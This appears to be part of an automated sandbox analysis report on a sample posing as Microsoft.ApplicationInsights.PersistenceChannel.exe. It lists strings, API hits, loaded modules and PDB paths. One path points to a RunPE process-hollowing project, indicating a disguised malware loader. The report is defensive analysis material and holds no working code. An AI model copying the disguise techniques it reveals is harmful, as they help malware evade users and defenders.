Source: sqlite3.dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: sqlite3.dll.2.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: sqlite3.dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: sqlite3.dll.2.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: sqlite3.dll.2.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: sqlite3.dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: sqlite3.dll.2.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: sqlite3.dll.2.dr	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: 2.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.1.unpack, Microsoft.ApplicationInsights.Channel/u00331A7E684.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, Microsoft.ApplicationInsights.Channel/u00331A7E684.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, Microsoft.ApplicationInsights.Channel/u00331A7E684.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.1.unpack, Microsoft.ApplicationInsights.Channel/u00331A7E684.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 2.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.0.unpack, Microsoft.ApplicationInsights.Channel/u00331A7E684.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.15.unpack, Microsoft.ApplicationInsights.Channel/u00331A7E684.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, Microsoft.ApplicationInsights.Channel/u00331A7E684.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5576:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7056

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp

Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbt/

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, u00341CE8079/u0036E29A2B8.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.1.unpack, u00341CE8079/u0036E29A2B8.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/u0036E29A2B8.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.15.unpack, u00341CE8079/u0036E29A2B8.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/u0036E29A2B8.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.1.unpack, u00341CE8079/u0036E29A2B8.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.0.unpack, u00341CE8079/u0036E29A2B8.cs	Cryptographic APIs: 'CreateDecryptor'

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe

Static PE information: certificate valid

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: KC:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.PDB source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source:	Binary string: rsaenh.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source:	Binary string: C:\Windows\dll\Microsoft.VisualBasic.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source:	Binary string: System.ni.pdb% source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.ni.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000000B.00000003.699534963.00000000050EA000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Configuration.pdba source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.ApplicationInsights.PersistenceChannel.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 0000000B.00000003.699575783.00000000031A6000.00000004.00000001.sdmp
Source:	Binary string: moryProtection.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: isualBasic.pdbW source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source:	Binary string: ml.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: .ni.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: clr.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source:	Binary string: cryptsp.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Windows.Forms.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: ility.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source:	Binary string: f:\Builds\629\AppInsights\DC_Core_release_signed\obj\Release\TelemetryChannels\PersistenceChannel\Net40\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: f:\Builds\629\AppInsights\DC_Core_release_signed\obj\Release\TelemetryChannels\PersistenceChannel\Net40\Microsoft.ApplicationInsights.PersistenceChannel.pdbeChannel.PDB source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source:	Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: System.pdb"" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: System.Xml.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: System.Windows.Forms.pdb8 source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbt/ source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: mscoree.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source:	Binary string: System.Runtime.Remoting.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: w.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: System.Configuration.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: wsspicli.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdbm source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.PDB source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source:	Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: msasn1.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: \??\C:\Windows\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdbdr source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source:	Binary string: f:\Builds\629\AppInsights\DC_Core_release_signed\obj\Release\TelemetryChannels\PersistenceChannel\Net40\Microsoft.ApplicationInsights.PersistenceChannel.pdbCO source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source:	Binary string: mscorlib.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: InC:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source:	Binary string: comctl32v582.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.ni.pdbT3}l source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000000B.00000003.711688780.0000000005644000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Drawing.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: System.pdbH source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: \??\C:\Windows\Microsoft.ApplicationInsights.PersistenceChannel.pdbf9z source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source:	Binary string: System.Configuration.pdbD source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 0000000B.00000003.699953933.00000000031B2000.00000004.00000001.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDSO* source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: Accessibility.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: System.Runtime.Remoting.pdblrP source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: msvcr120_clr0400.i386.pdb: source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\Microsoft.ApplicationInsights.PersistenceChannel.pdbpdbnel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source:	Binary string: Microsoft.ApplicationInsights.PersistenceChannel.pdb{{ source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: ml.ni.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source:	Binary string: Windows.Storage.pdb: source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Core.ni.pdbRSDSD source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: comctl32v582.pdb: source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: Accessibility.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: C:\Windows\Resources\new\Repo\Debug\private\RUNPE\JabrezRPE\JabrezRPE\obj\Debug\RunPE_MemoryProtection.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.736476721.0000000003F32000.00000004.00000001.sdmp
Source:	Binary string: rawing.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: mscoreei.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source:	Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.ApplicationInsights.PersistenceChannel.PDB source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb\ source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: userenv.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: RunPE_MemoryProtection.pdbFyg source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: diasymreader.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: ore.pdb, source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: uilds\629\AppInsights\DC_Core_release_signed\obj\Release\TelemetryChannels\PersistenceChannel\Net40\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source:	Binary string: System.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 0000000B.00000003.699575783.00000000031A6000.00000004.00000001.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.ApplicationInsights.PersistenceChannel.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: C:\Windows\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source:	Binary string: System.Core.pdbR source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: WLDP.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: \??\C:\Windows\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdboq source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source:	Binary string: clrjit.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: symbols\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source:	Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: System.Runtime.Remoting.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: version.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: RunPE_MemoryProtection.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: wintrust.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Xml.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: System.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: ore.ni.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: ore.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: Microsoft.ApplicationInsights.PersistenceChannel.pdbd source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source:	Binary string: psapi.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: rawing.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: System.Core.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: mscoreei.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000B.00000003.699980162.00000000031B8000.00000004.00000001.sdmp
Source:	Binary string: Amsi.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Drawing.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: combase.pdbk source: WerFault.exe, 0000000B.00000003.711688780.0000000005644000.00000004.00000040.sdmp
Source:	Binary string: System.Core.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbrt- source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source:	Binary string: bcryptprimitives.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.VisualBasic.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: untime.Remoting.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: System.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: cryptbase.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: crypt32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp

Data Obfuscation:

